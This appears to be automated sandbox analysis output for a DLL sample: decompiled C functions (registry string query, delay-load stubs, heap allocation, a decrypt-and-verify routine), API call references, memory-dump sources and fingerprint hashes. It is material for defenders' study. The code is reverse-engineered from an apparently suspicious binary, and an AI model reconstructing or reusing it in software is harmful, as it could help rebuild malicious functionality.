                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E01C1167E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v12;
                				void* _v18;
                				short _v20;
                				intOrPtr _t15;
                				short _t17;
                				intOrPtr _t19;
                				short _t23;
                
                				_t23 = 0;
                				_v20 = 0;
                				// zero a 14-byte VARIANT-like local (3 dwords + 1 word) before the query
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t15 =  *0x1c1a2d8; // 0x55d5a8
                				_t4 = _t15 + 0x1c1b39c; // 0x2178944
                				_t20 = _t4;
                				_t6 = _t15 + 0x1c1b124; // 0x650047
                				// 0x80000002 == HKEY_LOCAL_MACHINE; the result type lands in _v20 and the value in _v12
                				_t17 = E01C151C7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                				if(_t17 < 0) {
                					_t23 = _t17; // propagate the negative HRESULT
                				} else {
                					if(_v20 != 8) { // 8 == VT_BSTR: only a string value is accepted
                						_t23 = 1;
                					} else {
                						_t19 = E01C12E50(_t20, _v12); // duplicate the wide string (lstrlenW/memcpy/memset, see subcalls)
                						if(_t19 == 0) {
                							_t23 = 8; // allocation failure
                						} else {
                							 *_a16 = _t19;
                						}
                						__imp__#6(_v12); // OLEAUT32 ordinal 6 == SysFreeString
                					}
                				}
                				return _t23;
                			}


                APIs
                  • Part of subcall function 01C151C7: SysFreeString.OLEAUT32(?), ref: 01C152A6
                  • Part of subcall function 01C12E50: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01C16B5B,004F0053,00000000,?), ref: 01C12E59
                  • Part of subcall function 01C12E50: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01C16B5B,004F0053,00000000,?), ref: 01C12E83
                  • Part of subcall function 01C12E50: memset.NTDLL ref: 01C12E97
                • SysFreeString.OLEAUT32(00000000), ref: 01C116E4
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: 7cf8f879fdb7e776abb85eeb203c4b62279dd49876e51f0b5449dad911174deb
                • Instruction ID: 86156676352f287eb592312510e2beecbcea07595cffe6a1884b6aea5f3133e8
                • Opcode Fuzzy Hash: 7cf8f879fdb7e776abb85eeb203c4b62279dd49876e51f0b5449dad911174deb
                • Instruction Fuzzy Hash: 3D01B13159002AFFDF119FA8CC04EAEBBB8FB0A700F080855EB05E6024D7B2D915EB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CFDC6: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDE5
                  • Part of subcall function 046CFDC6: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDF0
                  • Part of subcall function 046CFDC6: _wcsupr.NTDLL ref: 046CFDFD
                  • Part of subcall function 046CFDC6: lstrlenW.KERNEL32(00000000), ref: 046CFE05
                • ResumeThread.KERNEL32(00000004,?,046C3875,?), ref: 046C6567
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                • String ID:
                • API String ID: 3646851950-0
                • Opcode ID: 951ab759f4202ccf95fa9215123fec46c77d44a2ec2f8263cc115fc6bf37817c
                • Instruction ID: 679635f5b0a588bcaf76368ef9d8eda2e696b8f03649e12ba5692bbfa209cb2e
                • Opcode Fuzzy Hash: 951ab759f4202ccf95fa9215123fec46c77d44a2ec2f8263cc115fc6bf37817c
                • Instruction Fuzzy Hash: 21D05E30A44301E6EB316B21CD44B26BEE2DF70A54F50841DF988851A8FB72BC10961D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BC5() {
                
                				E01C17D66(0x1c192c4, 0x1c1a128); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 055be13df474605ada22762e9d54477220023537783a102ba0ae7d56db4a29dd
                • Instruction ID: 5137264dbd5986fe0fad64ffc9333531a8a0f63bfbbbc7234905245fd86f5291
                • Opcode Fuzzy Hash: 055be13df474605ada22762e9d54477220023537783a102ba0ae7d56db4a29dd
                • Instruction Fuzzy Hash: 81B012C22D9302EC315471461C01C37215CD2C3E10330411FF400C134CE440CD453032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BCF() {
                
                				E01C17D66(0x1c192c4, 0x1c1a124); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 0634bd67a990ef28341017cd306d6a2aa8c870b265a3eb5f973433f883b31ad9
                • Instruction ID: f2a8c560c27934fe31d4688934debdab7567f9c874dcff054e91003647b27acd
                • Opcode Fuzzy Hash: 0634bd67a990ef28341017cd306d6a2aa8c870b265a3eb5f973433f883b31ad9
                • Instruction Fuzzy Hash: A3B012D22D9202EC311471461D01C3721ACD1C3E10330401FF000C134CE440CE063032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BD9() {
                
                				E01C17D66(0x1c192c4, 0x1c1a120); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 900610c941904d756482cd50ab77b50635cf15537e911b87cb426dd7d11c1972
                • Instruction ID: 1b388d390158865b4b808d2464875701c08bcbd808d2284265a115c5d1341832
                • Opcode Fuzzy Hash: 900610c941904d756482cd50ab77b50635cf15537e911b87cb426dd7d11c1972
                • Instruction Fuzzy Hash: 45B012C32D9206EC311471461C01C37215CE1C3E20330411FF000C134CE440CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BE3() {
                
                				E01C17D66(0x1c192c4, 0x1c1a11c); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 0f64828efa4cf9ee80e8d9edf78c7e08626f442fc09e7ef7f003e2bb72638b60
                • Instruction ID: eb303246207d7efa188bc18898ff6cd0e902edb49f7ee198b9af2179f71a8197
                • Opcode Fuzzy Hash: 0f64828efa4cf9ee80e8d9edf78c7e08626f442fc09e7ef7f003e2bb72638b60
                • Instruction Fuzzy Hash: 47B012C22D9202EC312472561C02C37210CD1C3E10330801EF400C134CE440CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BED() {
                
                				E01C17D66(0x1c192c4, 0x1c1a118); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: c3f47a7261d0db25c40beaed6a375a7c060c207337310e7fef549144e1274f77
                • Instruction ID: c9ac8686e884946438c6497dd15ca0acc92145bbff51f782e507feffc583a0df
                • Opcode Fuzzy Hash: c3f47a7261d0db25c40beaed6a375a7c060c207337310e7fef549144e1274f77
                • Instruction Fuzzy Hash: 4FB012C26D9302EC316471561C02C37210CD2C3E10330811EF400C134CE440CD453032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BF7() {
                
                				E01C17D66(0x1c192c4, 0x1c1a114); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 441dad0cd75f28dff6ca007d9e36d0d1dbbb62533b9cf0358b4e5d597525527e
                • Instruction ID: b40d406166262c5728fd965003428a3d2d9a66f77cdae839b4b0c4e9766715a1
                • Opcode Fuzzy Hash: 441dad0cd75f28dff6ca007d9e36d0d1dbbb62533b9cf0358b4e5d597525527e
                • Instruction Fuzzy Hash: F0B012C22D9202EC312471565D02C37210CD1C3E10330401EF000C134CE440CE063032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BA0() {
                
                				E01C17D66(0x1c192c4, 0x1c1a110); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: f360f31359413ef31553832322506db2cffde90b61f9ca792a3ef7abbd064519
                • Instruction ID: 71f11453fa07baa589dca5024a8988f13b3728b61efcc34f1b095955ba86e880
                • Opcode Fuzzy Hash: f360f31359413ef31553832322506db2cffde90b61f9ca792a3ef7abbd064519
                • Instruction Fuzzy Hash: D0B012C27DD602FC312431525C02C37210CF1D3E21330441EF001D028CE440CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17BBB() {
                
                				E01C17D66(0x1c192c4, 0x1c1a12c); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 905825a9ebcbe2b60df690f5a347800690506e3742a9c6a87095475f166ef267
                • Instruction ID: 0f9744b6ef40154ed56e9dc5da87cb90453e5dc8252fdfe4a0501a6c8839dcf6
                • Opcode Fuzzy Hash: 905825a9ebcbe2b60df690f5a347800690506e3742a9c6a87095475f166ef267
                • Instruction Fuzzy Hash: 7EB012C22D9202EC311471961C01C37215CD2C3E10330801FF500C134CE540CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17C84() {
                
                				E01C17D66(0x1c19344, 0x1c1a140); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17C96
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: bb3db8ddd98d1dee9913f5fbb1c33431b9cf360bde21fb2ebd8bb7b280af33dc
                • Instruction ID: ea399097cfd95d39f6475d7195daf7952e866a77ecf2bcb17551f814ceb95c17
                • Opcode Fuzzy Hash: bb3db8ddd98d1dee9913f5fbb1c33431b9cf360bde21fb2ebd8bb7b280af33dc
                • Instruction Fuzzy Hash: B9B012D22D920AFC321422471E16C36110CD1C3E20370412EF001C514CD450CD013033
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C17C9F() {
                
                				E01C17D66(0x1c19344, 0x1c1a150); // executed
                				goto __eax;
                			}

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17C96
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: b340dce6815a7326c11aace9d865e1dba27b89d7db8a9810e34cbf35489c9d31
                • Instruction ID: c07a21b98d8281882e979cc362b3f3dbbf7c541f2bc78aee10395462007b38ad
                • Opcode Fuzzy Hash: b340dce6815a7326c11aace9d865e1dba27b89d7db8a9810e34cbf35489c9d31
                • Instruction Fuzzy Hash: EDB012C22D9202EC321462861C16C36114CD1C7E20370942EF000C634CD450CC053032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C12114(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x1c1a290, 0, _a4); // executed
                				return _t2;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e4cb84a49c9de5855ec234e717433cf5db820b4f1e16417ce1f475dd23abf1d6
                • Instruction ID: 26c13dea28616ed57f45b0f80f439cfee4a93d6c3750d1ae66d1be031faa36c2
                • Opcode Fuzzy Hash: e4cb84a49c9de5855ec234e717433cf5db820b4f1e16417ce1f475dd23abf1d6
                • Instruction Fuzzy Hash: B4B01231095110AFCA228B00DD04F057B32B775B00F108010B20A01068C232C420EB08
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 7a751642ad8270727b6874cb65d8f4ef364745ed4b88b1c1e96bc3b4379e9cb0
                • Instruction ID: f484026df18f1ce1534cd110e258c9325ab986cf6f2a952ce4ce9c1122f34c7e
                • Opcode Fuzzy Hash: 7a751642ad8270727b6874cb65d8f4ef364745ed4b88b1c1e96bc3b4379e9cb0
                • Instruction Fuzzy Hash: 5DB01235040200EFDB019B01DD04F057AA1F790700F105020B2041A460D2360C70FF24
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: dccf6220b00aaf6ec82b728f6a48c74d3e347fb1cc8297f4deba6029d48d9744
                • Instruction ID: 39f90e1936043cbe138a3e435c2dde8eb37ce7b8e80d839508a3de1775713379
                • Opcode Fuzzy Hash: dccf6220b00aaf6ec82b728f6a48c74d3e347fb1cc8297f4deba6029d48d9744
                • Instruction Fuzzy Hash: 8DB01235000300ABDB11DB01ED04F067BA1E790700F005420B20859060D3361C74EF34
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C124F7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                				void* _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				char _v144;
                				int _v148;
                				intOrPtr _v152;
                				intOrPtr _v156;
                				intOrPtr _v160;
                				char _v164;
                				void* _t37;
                				void* _t42;
                				void* _t51;
                				int _t53;
                				void* _t60;
                				void* _t63;
                				void* _t64;
                
                				_t53 = 0;
                				_t60 = __ecx;
                				_v16 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                					L21:
                					return _t53;
                				} else {
                					_t58 =  &_v164;
                					_t37 = E01C12B0C(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                					if(_t37 != 0) {
                						goto L21;
                					}
                					_t61 = _t60 - 0x80;
                					if(_v148 > _t60 - 0x80) {
                						goto L21;
                					}
                					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                						_t37 = _t37 + 1;
                						if(_t37 < 0x10) {
                							continue;
                						}
                						_t53 = _v148;
                						_t51 = E01C12114(_t53);
                						_t73 = _t51;
                						_v8 = _t51;
                						if(_t51 != 0) {
                							_t53 = 0;
                							L18:
                							if(_t53 != 0) {
                								goto L21;
                							}
                							L19:
                							if(_v8 != 0) {
                								E01C12C11(_v8);
                							}
                							goto L21;
                						}
                						memcpy(_t51, _a4, _t53);
                						L8:
                						_t63 = _v8;
                						E01C15374(_t58, _t73, _t63, _t53,  &_v32);
                						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                							L15:
                							_t53 = 0;
                							goto L19;
                						} else {
                							 *_a8 = _t63;
                							goto L18;
                						}
                					}
                					_t58 =  &_v144;
                					_t42 = E01C178F2(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                					__eflags = _t42;
                					if(_t42 != 0) {
                						_t53 = _v12;
                						goto L18;
                					}
                					_t53 = _v148;
                					__eflags = _v12 - _t53;
                					if(__eflags >= 0) {
                						goto L8;
                					}
                					goto L15;
                				}
                			}

                APIs
                • memcpy.NTDLL(00000000,?,?,?,?,01C17307,00000001,?,?,01C17307), ref: 01C1257E
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction ID: c507be93563b7f651a688a1a5e3916ec1e3cdec0d4a9fe1e00d41de7e06d1fa4
                • Opcode Fuzzy Hash: b2e9ab7f748de7610b934f7e3a7f46cbb3514406687df12c621ed21e5053afa3
                • Instruction Fuzzy Hash: 6C316F75940219EFDF21DEA8C9D0AADB778BB46204F2044A9E605A7185D630DF85EF20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,74E5F710,00000000,00000000,?,?,?,046D2C46,?), ref: 046DC443
                  • Part of subcall function 046C57A1: memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,046DC3FA,?,00000001,?,?,?,?), ref: 046C57C4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreememcpy
                • String ID:
                • API String ID: 1301464996-0
                • Opcode ID: 19bfab9528e30f2f563736f1b1e14066feae3fe3e68f45bf84c580c5ebdb4be4
                • Instruction ID: e1b9e39028c4d57ef5cc7ba44daf3777d4c2552b7a0f521337b7f5fbd8feaad3
                • Opcode Fuzzy Hash: 19bfab9528e30f2f563736f1b1e14066feae3fe3e68f45bf84c580c5ebdb4be4
                • Instruction Fuzzy Hash: 58118C75A90309EFDB149F9ADC90EB977A8EB98204F500029E6029B240F675BD01DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,046EE3A4,00000018,046CAA0D,04C98E36,?,046CAA0D,04C98E36,?,046CAA0D,04C98E36,?,?,?,?,046CAA0D), ref: 046D0BAB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 782c0ced67d9590cb07f6ed3012636709a9d20cc01dbc84226c0118056f69c69
